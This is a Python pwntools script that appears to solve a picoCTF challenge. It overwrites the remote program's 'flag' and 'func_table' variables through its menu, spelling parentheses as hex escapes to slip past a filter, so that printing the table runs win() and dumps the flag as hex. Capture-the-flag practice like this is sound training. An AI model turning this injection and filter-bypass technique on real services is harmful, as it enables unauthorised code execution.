import argparse
from pwn import *
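def get_port(argv=None):
    """Parse the command line and return the target port.

    Args:
        argv: argument list to parse. ``None`` (the default, and what the
            script's entry point uses) means ``sys.argv[1:]``; passing an
            explicit list makes the function testable without touching
            ``sys.argv``.

    Returns:
        The port as the string that was typed; the script hands it straight
        to ``remote()`` without conversion.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("port", help="The netcat port")
    # Named `args` rather than `input`, which shadowed the builtin.
    args = parser.parse_args(argv)
    return args.port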
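def send_command(conn, command):
    """Send one line to the remote and return the next chunk of its reply as text.

    Args:
        conn: a pwntools tube (anything providing ``sendline`` and ``recv``).
        command: the line to send; the tube appends the newline.

    Returns:
        The received bytes decoded as UTF-8. Bytes that are not valid UTF-8
        are replaced with U+FFFD instead of raising: the reply comes from an
        untrusted host, and a decode error would abort the exploit mid-run.

    Note:
        A single ``recv`` returns whatever has arrived so far, not necessarily
        the complete reply. Callers that need a command's whole output should
        expect a possibly truncated chunk.
    """
    conn.sendline(command)
    reply = conn.recv()
    return reply.decode("utf-8", errors="replace")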
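def _decode_hex_table(table):
    """Turn the printed table text into the flag string.

    The reply is expected to contain ``0x``-prefixed hex tokens separated by
    ``==>`` markers and spaces; stripping those leaves a bare hex string for
    ``bytes.fromhex``.

    Raises:
        ValueError: if anything other than hex digits remains, e.g. because
            the reply was truncated or contained menu text.
    """
    hex_digits = table.replace("==>", "").replace("0x", "").replace(" ", "")
    raw = bytes.fromhex(hex_digits)
    # The flag is expected to be ASCII; any other byte in the dump is shown as
    # U+FFFD rather than aborting after the exploit has already fired.
    return raw.decode("utf-8", errors="replace")


def get_flag(conn):
    """Drive the challenge menu over an open tube and return the decoded flag.

    The sequence is: point the ``flag`` variable at the text ``win()``,
    overwrite ``func_table`` so ``win`` is its first entry, then print the
    table, which runs ``win()`` and dumps the flag as hex.

    Args:
        conn: a pwntools tube connected to the challenge.

    Returns:
        The flag text recovered from the hex dump.

    Raises:
        ValueError: if the table reply cannot be parsed as hex (see
            ``_decode_hex_table``).
    """
    # Menu option 3 followed by a name and a value looks like "write
    # variable" (inferred from the command sequence; confirm against the
    # challenge). The remote receives the literal text
    # "win" + "\x28" + "\x29"; \x28/\x29 are "(" and ")", presumably spelled
    # as escapes because a literal parenthesis is rejected -- confirm.
    win_call = '"win" + "\\x28" + "\\x29"'
    send_command(conn, "3")
    send_command(conn, "flag")
    send_command(conn, win_call)

    # Put win first in func_table so that printing the table invokes it.
    # NOTE(review): the original comment called this value "128 bytes", but
    # the literal is 51 characters; 128 is presumably the size of func_table
    # in the target -- confirm.
    patched_table = "'win read_variable write_variable getRandomNumber '"
    send_command(conn, "3")
    send_command(conn, "func_table")
    send_command(conn, patched_table)

    # Menu option 1 prints the table, which now runs win(). One recv may
    # return only part of the output; a truncated reply surfaces as a
    # ValueError from the decoder rather than a wrong flag.
    table = send_command(conn, "1")
    return _decode_hex_table(table)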
if __name__ == "__main__":
    # Target host is fixed; only the port is taken from the command line.
    target_host = 'saturn.picoctf.net'
    target_port = get_port()
    # The tube's context manager closes the socket on exit, whether get_flag
    # succeeds or raises.
    with remote(target_host, target_port) as conn:
        flag = get_flag(conn)
        separator = "-" * 50
        print(separator)
        print(f"Flag: {flag}")
        print(separator)